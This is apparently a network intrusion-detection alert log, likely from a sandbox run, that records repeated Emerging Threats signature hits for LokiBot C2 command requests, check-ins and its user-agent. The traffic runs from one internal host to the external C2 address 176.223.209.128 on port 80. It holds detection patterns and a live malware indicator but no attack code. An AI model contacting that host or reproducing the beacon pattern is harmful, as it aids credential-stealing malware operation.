                                              11/25/21-10:50:19.685636TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009680192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.685636TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009680192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.685636TCP2025381ET TROJAN LokiBot Checkin5009680192.168.11.20176.223.209.128
                                              11/25/21-10:50:19.685636TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009680192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.207253TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009780192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.207253TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009780192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.207253TCP2025381ET TROJAN LokiBot Checkin5009780192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.207253TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009780192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.723424TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009880192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.723424TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009880192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.723424TCP2025381ET TROJAN LokiBot Checkin5009880192.168.11.20176.223.209.128
                                              11/25/21-10:50:20.723424TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009880192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.159997TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15009980192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.159997TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5009980192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.159997TCP2025381ET TROJAN LokiBot Checkin5009980192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.159997TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25009980192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.648991TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010080192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.648991TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010080192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.648991TCP2025381ET TROJAN LokiBot Checkin5010080192.168.11.20176.223.209.128
                                              11/25/21-10:50:21.648991TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010080192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.166713TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010180192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.166713TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010180192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.166713TCP2025381ET TROJAN LokiBot Checkin5010180192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.166713TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010180192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.680856TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010280192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.680856TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010280192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.680856TCP2025381ET TROJAN LokiBot Checkin5010280192.168.11.20176.223.209.128
                                              11/25/21-10:50:22.680856TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010280192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.190149TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010380192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.190149TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010380192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.190149TCP2025381ET TROJAN LokiBot Checkin5010380192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.190149TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010380192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.717956TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010480192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.717956TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010480192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.717956TCP2025381ET TROJAN LokiBot Checkin5010480192.168.11.20176.223.209.128
                                              11/25/21-10:50:23.717956TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010480192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.185756TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010580192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.185756TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010580192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.185756TCP2025381ET TROJAN LokiBot Checkin5010580192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.185756TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010580192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.703007TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010680192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.703007TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010680192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.703007TCP2025381ET TROJAN LokiBot Checkin5010680192.168.11.20176.223.209.128
                                              11/25/21-10:50:24.703007TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010680192.168.11.20176.223.209.128
                                              11/25/21-10:50:25.332854TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010780192.168.11.20176.223.209.128
                                              11/25/21-10:50:25.332854TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010780192.168.11.20176.223.209.128
                                              11/25/21-10:50:25.332854TCP2025381ET TROJAN LokiBot Checkin5010780192.168.11.20176.223.209.128
                                              11/25/21-10:50:25.332854TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010780192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.078077TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010880192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.078077TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010880192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.078077TCP2025381ET TROJAN LokiBot Checkin5010880192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.078077TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010880192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.807858TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15010980192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.807858TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5010980192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.807858TCP2025381ET TROJAN LokiBot Checkin5010980192.168.11.20176.223.209.128
                                              11/25/21-10:50:26.807858TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25010980192.168.11.20176.223.209.128
                                              11/25/21-10:50:27.596260TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011080192.168.11.20176.223.209.128
                                              11/25/21-10:50:27.596260TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011080192.168.11.20176.223.209.128
                                              11/25/21-10:50:27.596260TCP2025381ET TROJAN LokiBot Checkin5011080192.168.11.20176.223.209.128
                                              11/25/21-10:50:27.596260TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011080192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.402048TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011180192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.402048TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011180192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.402048TCP2025381ET TROJAN LokiBot Checkin5011180192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.402048TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011180192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.896038TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011280192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.896038TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011280192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.896038TCP2025381ET TROJAN LokiBot Checkin5011280192.168.11.20176.223.209.128
                                              11/25/21-10:50:28.896038TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011280192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.419476TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011380192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.419476TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011380192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.419476TCP2025381ET TROJAN LokiBot Checkin5011380192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.419476TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011380192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.941230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011480192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.941230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011480192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.941230TCP2025381ET TROJAN LokiBot Checkin5011480192.168.11.20176.223.209.128
                                              11/25/21-10:50:29.941230TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011480192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.460479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011580192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.460479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011580192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.460479TCP2025381ET TROJAN LokiBot Checkin5011580192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.460479TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011580192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.962182TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011680192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.962182TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011680192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.962182TCP2025381ET TROJAN LokiBot Checkin5011680192.168.11.20176.223.209.128
                                              11/25/21-10:50:30.962182TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011680192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.469315TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011780192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.469315TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011780192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.469315TCP2025381ET TROJAN LokiBot Checkin5011780192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.469315TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011780192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.996695TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011880192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.996695TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011880192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.996695TCP2025381ET TROJAN LokiBot Checkin5011880192.168.11.20176.223.209.128
                                              11/25/21-10:50:31.996695TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011880192.168.11.20176.223.209.128
                                              11/25/21-10:50:32.501488TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15011980192.168.11.20176.223.209.128
                                              11/25/21-10:50:32.501488TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5011980192.168.11.20176.223.209.128
                                              11/25/21-10:50:32.501488TCP2025381ET TROJAN LokiBot Checkin5011980192.168.11.20176.223.209.128
                                              11/25/21-10:50:32.501488TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25011980192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.031278TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012080192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.031278TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012080192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.031278TCP2025381ET TROJAN LokiBot Checkin5012080192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.031278TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012080192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.541841TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012180192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.541841TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012180192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.541841TCP2025381ET TROJAN LokiBot Checkin5012180192.168.11.20176.223.209.128
                                              11/25/21-10:50:33.541841TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012180192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.090399TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012280192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.090399TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012280192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.090399TCP2025381ET TROJAN LokiBot Checkin5012280192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.090399TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012280192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.608634TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012380192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.608634TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012380192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.608634TCP2025381ET TROJAN LokiBot Checkin5012380192.168.11.20176.223.209.128
                                              11/25/21-10:50:34.608634TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012380192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.099444TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012480192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.099444TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012480192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.099444TCP2025381ET TROJAN LokiBot Checkin5012480192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.099444TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012480192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.566498TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012580192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.566498TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012580192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.566498TCP2025381ET TROJAN LokiBot Checkin5012580192.168.11.20176.223.209.128
                                              11/25/21-10:50:35.566498TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012580192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.059383TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012680192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.059383TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012680192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.059383TCP2025381ET TROJAN LokiBot Checkin5012680192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.059383TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012680192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.558923TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012780192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.558923TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012780192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.558923TCP2025381ET TROJAN LokiBot Checkin5012780192.168.11.20176.223.209.128
                                              11/25/21-10:50:36.558923TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012780192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.058804TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012880192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.058804TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012880192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.058804TCP2025381ET TROJAN LokiBot Checkin5012880192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.058804TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012880192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.561802TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15012980192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.561802TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5012980192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.561802TCP2025381ET TROJAN LokiBot Checkin5012980192.168.11.20176.223.209.128
                                              11/25/21-10:50:37.561802TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25012980192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.063390TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013080192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.063390TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013080192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.063390TCP2025381ET TROJAN LokiBot Checkin5013080192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.063390TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013080192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.501799TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013180192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.501799TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013180192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.501799TCP2025381ET TROJAN LokiBot Checkin5013180192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.501799TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013180192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.984853TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013280192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.984853TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013280192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.984853TCP2025381ET TROJAN LokiBot Checkin5013280192.168.11.20176.223.209.128
                                              11/25/21-10:50:38.984853TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013280192.168.11.20176.223.209.128
                                              11/25/21-10:50:39.497980TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013380192.168.11.20176.223.209.128
                                              11/25/21-10:50:39.497980TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013380192.168.11.20176.223.209.128
                                              11/25/21-10:50:39.497980TCP2025381ET TROJAN LokiBot Checkin5013380192.168.11.20176.223.209.128
                                              11/25/21-10:50:39.497980TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013380192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.012551TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013480192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.012551TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013480192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.012551TCP2025381ET TROJAN LokiBot Checkin5013480192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.012551TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013480192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.520116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013580192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.520116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013580192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.520116TCP2025381ET TROJAN LokiBot Checkin5013580192.168.11.20176.223.209.128
                                              11/25/21-10:50:40.520116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013580192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.030705TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013680192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.030705TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013680192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.030705TCP2025381ET TROJAN LokiBot Checkin5013680192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.030705TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013680192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.524484TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013780192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.524484TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013780192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.524484TCP2025381ET TROJAN LokiBot Checkin5013780192.168.11.20176.223.209.128
                                              11/25/21-10:50:41.524484TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013780192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.040785TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013880192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.040785TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013880192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.040785TCP2025381ET TROJAN LokiBot Checkin5013880192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.040785TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013880192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.534729TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15013980192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.534729TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5013980192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.534729TCP2025381ET TROJAN LokiBot Checkin5013980192.168.11.20176.223.209.128
                                              11/25/21-10:50:42.534729TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25013980192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.037329TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014080192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.037329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014080192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.037329TCP2025381ET TROJAN LokiBot Checkin5014080192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.037329TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014080192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.557051TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014180192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.557051TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014180192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.557051TCP2025381ET TROJAN LokiBot Checkin5014180192.168.11.20176.223.209.128
                                              11/25/21-10:50:43.557051TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014180192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.009708TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014280192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.009708TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014280192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.009708TCP2025381ET TROJAN LokiBot Checkin5014280192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.009708TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014280192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.527358TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014380192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.527358TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014380192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.527358TCP2025381ET TROJAN LokiBot Checkin5014380192.168.11.20176.223.209.128
                                              11/25/21-10:50:44.527358TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014380192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.039531TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014480192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.039531TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014480192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.039531TCP2025381ET TROJAN LokiBot Checkin5014480192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.039531TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014480192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.509964TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014580192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.509964TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014580192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.509964TCP2025381ET TROJAN LokiBot Checkin5014580192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.509964TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014580192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.990994TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014680192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.990994TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014680192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.990994TCP2025381ET TROJAN LokiBot Checkin5014680192.168.11.20176.223.209.128
                                              11/25/21-10:50:45.990994TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014680192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.446020TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014780192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.446020TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014780192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.446020TCP2025381ET TROJAN LokiBot Checkin5014780192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.446020TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014780192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.964294TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014880192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.964294TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014880192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.964294TCP2025381ET TROJAN LokiBot Checkin5014880192.168.11.20176.223.209.128
                                              11/25/21-10:50:46.964294TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014880192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.480203TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15014980192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.480203TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5014980192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.480203TCP2025381ET TROJAN LokiBot Checkin5014980192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.480203TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25014980192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.989430TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015080192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.989430TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015080192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.989430TCP2025381ET TROJAN LokiBot Checkin5015080192.168.11.20176.223.209.128
                                              11/25/21-10:50:47.989430TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015080192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.492018TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015180192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.492018TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015180192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.492018TCP2025381ET TROJAN LokiBot Checkin5015180192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.492018TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015180192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.956654TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015280192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.956654TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015280192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.956654TCP2025381ET TROJAN LokiBot Checkin5015280192.168.11.20176.223.209.128
                                              11/25/21-10:50:48.956654TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015280192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.453055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015380192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.453055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5015380192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.453055TCP2025381ET TROJAN LokiBot Checkin5015380192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.453055TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25015380192.168.11.20176.223.209.128
                                              11/25/21-10:50:49.981482TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15015480192.168.11.20176.223.209.128
